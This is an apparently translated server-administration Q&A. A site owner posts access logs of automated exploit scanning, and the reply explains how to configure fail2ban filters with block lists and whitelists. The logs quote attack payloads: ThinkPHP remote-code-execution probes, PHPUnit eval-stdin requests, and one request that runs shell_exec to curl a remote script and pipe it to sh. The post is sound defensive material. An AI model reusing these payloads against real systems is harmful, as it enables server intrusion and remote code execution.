網路伺服器被攻擊
我的網路伺服器不斷受到嘗試使用 PHP 漏洞和使用 GET 請求的攻擊。我應該有多擔心我是否已被入侵,以及如何檢查一些請求返回 302 和一些返回 200。如果我被入侵,保持目前伺服器配置和刪除不需要的腳本的最佳方法是什麼。我提供的範例是在最後一天內提供的,這只是讓您了解問題有多嚴重的幾個範例。我應該如何應對這種情況?我也安裝了fail2ban。我可以提供您需要的任何其他範例/數據來幫助我解決此問題!非常感謝您!
一些訪問日誌資訊:
範例 1:
- - [11/Mar/2021:16:24:38 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:38 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:39 +0000] "POST /api/jsonws/invoke HTTP/1.1" 302 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:39 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 302 628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:40 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:40 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 302 598 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:40 +0000] "GET /console/ HTTP/1.1" 302 524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:40 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:40 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:40 +0000] "GET /_ignition/execute-solution HTTP/1.1" 302 560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:41 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:47 +0000] "GET /api/jsonws/invoke HTTP/1.1" 404 9450 "http:///api/jsonws/invoke" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "http:///solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:48 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - [11/Mar/2021:16:24:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 5239 "http://:/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:49 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 9450 "http://:/wp-content/plugins/wp-file-manager/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:49 +0000] "GET /console/ HTTP/1.1" 404 9450 "http://:/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 9450 "http:///index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:50 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 9450 "http:///_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 5239 "http:///?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:24:50 +0000] "GET /Autodiscover/Autodiscover.xml HTTP/1.1" 404 9450 "http:///Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [11/Mar/2021:16:44:50 +0000] "GET / HTTP/1.1" 200 5235 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
範例 2:
- - [11/Mar/2021:00:08:41 +0000] "GET /phpmyadmin/ HTTP/1.1" This line being spammed over 200 times
範例 3:
- - [11/Mar/2021:12:30:28 +0000] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http:///ldr.sh|sh HTTP/1.1" 200 5041
我安裝了fail2ban
安裝 fail2ban 是不夠的,您必須對其進行配置以滿足您的需求。Fail2ban 只是一個工具,需要像許多其他工具一樣正確使用。
要阻止這樣的“洪水”,您基本上有 3 種主要可能性:
- 如果您確定您的網頁基本上沒有一些損壞的連結,則足以對 404(或其他一些 40x)響應做出反應:
[bad-http] logpath = /path/to/your/log filter = # fail on every 40x (excepting 401 for authentication attempt, which should be handled separately): failregex = ^<ADDR> \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+ maxretry = 10 # findtime = some-time-after-maxretry-attempts-should-cause-a-ban enabled = true
並且您必須檢查(並且可能更正)導致 302 重定向的規則(可能是此重定向只會影響的 URI 白名單)。
- 如果您不能確定或需要更精確的處理,您必須創建一些此機器人經常使用的阻止列表 URI(或檢查引薦來源網址或某些 cookie 或其他任何內容),例如:
[bad-http] logpath = /path/to/your/log filter = # fail on certain 40x (uris starting with this block-list): _blocklist = vendor|solr|api|\?a=fetch|wp-content|console|\?XDEBUG_SESSION_START=|Autodiscover failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?:%(_blocklist)s)\b[^"]*" 40\d\s+ maxretry = 10 # findtime = some-time-after-maxretry-attempts-should-cause-a-ban enabled = true
請注意,在這種情況下,您必須檢查阻止列表中的 URI 前綴是否與您的合法 URI 衝突,並持續維護此列表。另請注意,“入侵者”避免您的禁令非常簡單,只需更改 URI(例如通過在您的前綴之前添加一些其他參數)
- 與 2 相同,但使用有效 URI 的白名單:
[bad-http] logpath = /path/to/your/log filter = # fail on certain 40x (excepting given white-list): _whitelist = my-app|other-app failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?!%(_whitelist)s)\b[^"]*" 40\d\s+ maxretry = 10 # findtime = some-time-after-maxretry-attempts-should-cause-a-ban enabled = true
在這裡,您可以指定所有有效的前綴 RE,
_whitelist
以避免可能的合法 URI 誤報。不管你用什麼,你可以從大
maxretry
(和短findtime
)和小的值開始bantime
(這樣可以避免可能的誤報太長的禁令),如果你的fail2ban版本> = 0.10並啟用bantime.increment
,那麼累犯的惡棍會被禁止更長時間以後更快。還可以考慮https://github.com/fail2ban/fail2ban/wiki/Best-practice以獲得一些建議,以獲取如何更有效地配置 fail2ban 監獄和過濾器的建議。